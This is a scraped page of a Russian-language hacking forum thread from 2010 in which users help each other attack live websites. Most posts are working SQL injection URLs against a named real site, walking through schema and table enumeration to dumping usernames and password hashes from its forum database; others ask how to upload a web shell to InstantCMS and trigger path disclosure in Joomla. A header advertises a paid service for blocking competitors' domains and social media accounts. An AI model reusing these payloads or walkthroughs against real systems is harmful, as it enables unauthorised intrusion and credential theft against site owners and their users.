УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 1516 из 2438

1516

Опции темы

Поиск в этой теме

Опции просмотра

#15151

25.09.2010, 20:54

Strilo4ka

Reservists Of Antichat - Level 6

Регистрация: 05.04.2009

Сообщений: 231

Провел на форуме:
3363660

Репутация: 1148

Цитата:

Сообщение от Mirrey

Mirrey said:
Как залить шелл в InstantCMS? Нигде не могу найти.

Поиск для чего на форуме!?

Когда то было выполнение кода в админке, ща хз.

/threadnav189469-2-10-instant%2Bcms.html

#15152

26.09.2010, 12:51

KandidaT'S

Guest

Сообщений: n/a

Провел на форуме:
20602

Репутация: 0

ВОобщем смотрите http://xtremelabs.org/index.php?location=news&url=-1+UNION+SELECT+1,2,3,group_concat%28column_name%29 ,group_concat%28column_name%29,6,7+from+informatio n_schema.columns+where+table_name=0x50524f46494c49 4e47%20-- Так Всё норм а делаю потом так http://xtremelabs.org/index.php?location=news&url=-1+UNION+SELECT+1,2,3,CPU_USER,5,6,7+from+PROFILING +--+ и нечего не получается =( в чём ошибака

#15153

26.09.2010, 12:56

ZARO

Познающий

Регистрация: 17.04.2009

Сообщений: 59

Провел на форуме:
401944

Репутация: 37

Отправить сообщение для ZARO с помощью ICQ

Цитата:

Сообщение от KandidaT'S

KandidaT'S said:
ВОобщем смотрите http://xtremelabs.org/index.php?location=news&url=-1+UNION+SELECT+1,2,3,group_concat%28column_name%29 ,group_concat%28column_name%29,6,7+from+informatio n_schema.columns+where+table_name=0x50524f46494c49 4e47%20-- Так Всё норм а делаю потом так http://xtremelabs.org/index.php?location=news&url=-1+UNION+SELECT+1,2,3,CPU_USER,5,6,7+from+PROFILING +--+ и нечего не получается =( в чём ошибака

http://xtremelabs.org/index.php?location=news&url=-1+UNION+SELECT+1,2,3,CPU_USER,5,6,7+from+informati on_schema.PROFILING+--+

Табла PROFILING - системная табла и в ней ничего полезного ты не найдешь, и она находится в счема information_schema. Поэтому перед таблой нужно написать счему откуда выводим.

#15154

26.09.2010, 13:06

-PRIVAT-

Участник форума

Регистрация: 17.04.2010

Сообщений: 221

Провел на форуме:
344917

Репутация: 17

KandidaT'S, давай выведем таблицы:

Цитата:

Сообщение от None

http://xtremelabs.org/index.php?location=news&url=-1+UNION+SELECT+1,2,3,group_concat%28table_name%29, 5,6,7+from+information_schema.tables--

Ну, а дальше выбирай таблицы и выводи колонки таким образом :

Цитата:

Сообщение от None

http://xtremelabs.org/index.php?location=news&url=-1+UNION+SELECT+1,2,3,group_concat%28column_name%29 ,5,6,7+from+information_schema.columns+where+table _name=0x7068706262666f72756d735f61636c5f7573657273--

table_name=TABLE_NAME в Hex виде. Hex вид можно получить тут

Затем, как выведешь колонки, выводи данные так:

Цитата:

Сообщение от None

http://xtremelabs.org/index.php?location=news&url=-1+UNION+SELECT+1,2,3,concat_ws(0x3a,Колонка ,колонка,колонка),5,6,7+from+TABLE_N AME

Где TABLE_NAME - имя таблицы откуда выводим.

#15155

26.09.2010, 13:34

Expl0ited

Guest

Сообщений: n/a

Провел на форуме:
262707

Репутация: 935

Цитата:

Сообщение от KandidaT'S

потому что там ничего нет, а вот это тебе будет интересней

Код:

Code:
http://xtremelabs.org/index.php?location=news&url=-1+UNION+SELECT+1,2,3,concat_ws(0x3a,username,user_password),5,6,7+from+xtremelabs_forums.phpbbforums_users+limit+1,1+--+

#15156

26.09.2010, 13:35

Strilo4ka

Reservists Of Antichat - Level 6

Регистрация: 05.04.2009

Сообщений: 231

Провел на форуме:
3363660

Репутация: 1148

Цитата:

Сообщение от KandidaT'S

БД

Код:

Code:
http://xtremelabs.org/index.php?location=news&url=-1+union+select+1,2,3,GROUP_CONCAT%28SCHEMA_NAME%20SEPARATOR%200x3a%29%20,5,6,7%20FROM%20information_schema.SCHEMATA

information_schema:xtremelabs_forums:xtremelabs_si te:xtremelabs_tforums

Tables

Код:

Code:
http://xtremelabs.org/index.php?location=news&url=-1+union+select+1,2,3,GROUP_CONCAT%28TABLE_NAME%20SEPARATOR%200x3a%29%20,5,6,7%20FROM%20information_schema.TABLES%20limit%200,1

Код:

Code:
http://xtremelabs.org/index.php?location=news&url=-1+union+select+1,2,3,database%28%29%20,5,6,7%20FROM%20information_schema.TABLES%20limit%200,1

БД текущая -> xtremelabs_site -> 0x787472656d656c6162735f73697465

Код:

Code:
http://xtremelabs.org/index.php?location=news&url=-1+union+select+1,2,3,GROUP_CONCAT%28TABLE_NAME%20SEPARATOR%200x3a%29%20,5,6,7%20FROM%20information_schema.TABLES%20WHERE%20TABLE_SCHEMA=0x787472656d656c6162735f73697465

admins:articles:articlescategories:categories:news :newscategories

там нет таблицы PROFILING, она в другой БД.

Код:

Code:
http://xtremelabs.org/index.php?location=news&url=-1+UNION+SELECT+1,2,3,TABLE_SCHEMA%20%20,5,6,7+from+information_schema.TABLES+where+table_name=0x50524f46494c494e47%20--

information_schema

она в схеме

Код:

Code:
http://xtremelabs.org/index.php?location=news&url=-1+union+select+1,2,3,%20count%28*%29%20,5,6,7%20FROM%20information_schema.PROFILING

Цитата:

Сообщение от None

Другие новости категории
[01.01.1970]
0

она пустая, там ниче нет.

#15157

26.09.2010, 14:58

KandidaT'S

Guest

Сообщений: n/a

Провел на форуме:
20602

Репутация: 0

Всем Спасибо

#15158

27.09.2010, 00:51

Zilt0

Новичок

Регистрация: 01.04.2009

Сообщений: 14

Провел на форуме:
92038

Репутация: 10

Отправить сообщение для Zilt0 с помощью ICQ

Всем привет,

как можно раскрыть пути в joomla 1.5.

#15159

27.09.2010, 00:59

Strilo4ka

Reservists Of Antichat - Level 6

Регистрация: 05.04.2009

Сообщений: 231

Провел на форуме:
3363660

Репутация: 1148

копипась моего поста, не помню где он.

Joomla_1.5.15-Stable-Full_Package.zip

у себя проверял

Код:

Code:
http://localhost/lastjoom/index.php?limitstart=-5

Цитата:

Сообщение от None

Warning: Invalid argument supplied for foreach() in Z:\home\localhost\www\lastjoom\components\com_cont ent\models\frontpage.php on line 104

может поможет.

#15160

27.09.2010, 01:36

YuNi|[c

Участник форума

Регистрация: 17.09.2006

Сообщений: 248

Провел на форуме:
556476

Репутация: 66

э хз как обойти в таком раскладе, может подскажем:

http://localhost/script.php

POST

ref=BIG'

что не пробовал на все одинаков ответ ((

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ')' at line 3

Что за трабла тут со скобками?

Страница 1516 из 2438

1516

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход